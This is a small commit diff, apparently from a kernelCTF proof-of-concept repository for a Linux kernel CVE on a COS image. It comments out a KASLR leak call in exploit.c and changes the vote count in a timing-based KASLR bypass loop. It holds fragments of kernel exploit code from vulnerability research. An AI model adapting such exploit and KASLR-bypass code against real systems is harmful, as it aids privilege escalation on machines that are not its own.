test

Author: Hc0wl

pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit.c

@@ -809,7 +809,7 @@ static long vuln_setup2(void)
 
 int main(void)
 {
-    leak_kaslr();
+    //leak_kaslr();
     init_libxdk();
     setup_kernel_address();
     setup_env();

pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.c

@@ -67,7 +67,7 @@ int bypass_kaslr(uint64_t base) {
 		#define END   (0xffffffffD0000000ull + OFFSET)
 		#define STEP   0x0000000001000000ull
 		while (1) {
-			uint64_t bases[7] = {0};
+			uint64_t bases[5] = {0};
 			for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) {
 				size_t times[(END - START) / STEP] = {};
 				uint64_t addrs[(END - START) / STEP];